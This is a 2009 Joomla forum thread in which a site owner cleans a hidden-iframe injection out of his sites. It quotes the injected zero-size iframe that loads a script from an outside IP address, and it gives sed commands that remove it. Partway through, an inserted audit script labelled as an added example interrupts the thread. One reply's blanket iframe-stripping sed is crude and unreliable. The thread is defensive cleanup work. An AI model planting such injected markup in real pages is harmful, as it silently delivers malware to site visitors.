Joomla! Discussion Forums
Posted: Wed Feb 04, 2009 10:23 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
These guys are so annoying.

So here's my site:
http://www.mymechanics.co.uk/

Before you click on it! There is a worm embedded in an iframe on the site.

It occurs in two places, here:
Code:
<body>
<div class="topbar">
<div id="navcontainer">
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><ul id="mainlevel-nav"><li><a href="http://www.mymechanics.co.uk/" class="mainlevel-nav" id="active_menu-nav">Home</a></li><li><a href="http://www.mymechanics.co.uk/Garages/" class="mainlevel-nav" >Browse Garages</a></li><li><a href="http://www.mymechanics.co.uk/Car-Advice/home" class="mainlevel-nav" >Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,14/" class="mainlevel-nav" >Add Garage</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,28/" class="mainlevel-nav" >Add Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/Forum/home" class="mainlevel-nav" >Forum</a></li></ul><div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>


Note that it occurs just before my first module is loaded (which is mod_mainmenu). Here is the section in my template index.php:

Code:
<body>
<div class="topbar">
<div id="navcontainer">
<?php mosLoadModules ( 'top',-1 ); ?>
<div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>


I have a couple of other modules loading.

Then it occurs immediately in my content pane:
Code:
<div class="right_banner"></div>
   
      <table class="contentpaneopen">
            <tr>
         <td valign="top" colspan="2">
            <div align="left"><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>      <div class="moduletable-si">
            <table class="siteinfo">


The div -si is another module called mod_siteinfo. Here it is in my index.php:

Code:
<div class="right_banner"><?php mosLoadModules('banner',-1);?></div>
<?php mosMainBody(); ?>
<?php if (mosCountModules('user1') || mosCountModules('user2')) { ?>


I've checked both the modules and there is no sign of it in here.

Where on earth is this code being put!? Could it be in the mosloadmodule call? Where is that?

Sorry, any help would be great.

Thanks,

Olly


Last edited by nutts4life on Thu Feb 05, 2009 7:40 pm, edited 1 time in total.

 Post subject: Re: Help ME!
Posted: Wed Feb 04, 2009 10:45 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Ok,

I've found out what these monkeys have done.

Every single one of the index.html's has got this code in them.

As you all know there's about 100 - 150 of these.

And I have 5 sites, that all have the same problem.

I need some ideas on how I'm going to get rid of these iframes.

Any ideas?

Thanks,

Olly


Posted: Thu Feb 05, 2009 7:43 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
OK, here's how I did it. I hope this is useful for someone one day.

The hacker had search and replaced ALL the php / html and htm files in my hosting area.

They had added the iframe html above.

So I logged into my hosting server using putty and ran the following commands from the root directory:
Code:
find -name "*.htm*" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

AND
Code:
find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;


This got rid of them.

Good luck and let's beat these guys.

n4l
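
An added example, not part of the original post: a read-only audit for the cleanup described above that lists the files carrying a zero-size iframe and previews what stripping it would change, so each file can be reviewed or restored from a clean copy before anything is edited in place. The function names and the matching pattern are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the thread). Read-only: no file is modified.
# Assumption: the injected markup is an <iframe> whose width or height is 0,
# like the one quoted in this thread. Legitimate hidden iframes match too,
# so review the list before acting on it.

HIDDEN_IFRAME_RE='<iframe[^>]*[[:space:]](width|height)="?0"?([[:space:]][^>]*)?>'

# list_infected_files DIR
#   Print every .php/.htm/.html/.js file under DIR containing a match.
list_infected_files() {
    find "${1:-.}" -type f \
        \( -name '*.php' -o -name '*.htm' -o -name '*.html' -o -name '*.js' \) \
        -exec grep -lEi "$HIDDEN_IFRAME_RE" {} +
}

# count_infected_files DIR
#   Number of files reported by list_infected_files.
count_infected_files() {
    list_infected_files "$1" | wc -l | tr -d ' '
}

# preview_removal FILE
#   Show as a diff what removing the matched iframe elements would change.
#   Output goes to stdout only; FILE is left untouched. The sed match is
#   case-sensitive, unlike the grep above.
preview_removal() {
    sed -E "s#${HIDDEN_IFRAME_RE}</iframe>##g" "$1" | diff "$1" -
}
```

Run `list_infected_files /path/to/webroot` first, then `preview_removal` on each reported file; an empty diff means the file would not change.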


Posted: Thu Feb 05, 2009 7:48 pm 
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 13247
Have you also found the way they came into your site? If not, it's going to be child's play to do it again.

_________________
Antonie de Wilde - Forum admin
All Joomla! release dates and days between releases: http://jfoobar.org/blog/189-days-betwee ... a-releases.test


Posted: Sat Feb 07, 2009 1:52 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Toni,

Thanks for the concern, I did find the way. I was using an include on one of my other sites and reading the parameters of the include from the URL!

How dumb was that. Anyway, I fixed it all. If it happens again, I will contact here.

Thanks,

n4l


Posted: Mon Jun 22, 2009 7:42 pm 
Joomla! Enthusiast

Joined: Wed Sep 24, 2008 6:06 pm
Posts: 107
Location: bangalore
I just modified the above script and used the following...
find -name "*.htm*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.php*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.js*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.html*" -exec sed -i 's/<iframe src=//' {} \;

but no output..
Is the command line correct?

_________________
Regards,
Raj
Web Developer, Bangalore, India
JOOMLA | DRUPAL | WORDPRESS| PHPBB |


Posted: Sun Oct 25, 2009 9:29 am 
Joomla! Virtuoso

Joined: Mon Mar 20, 2006 1:56 am
Posts: 3683
Location: The Girly Side of Joomla in Sussex
cagsan wrote:
And change the chmod of the files that infected from 777 to 666.

no - delete the infected files and replace with proper clean files and then make sure your site is secure

_________________
HU2HY - GIGO - Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and just deleted
http://community.joomla.org/ Connect Administrator
Have you read the instructions? Have you searched?

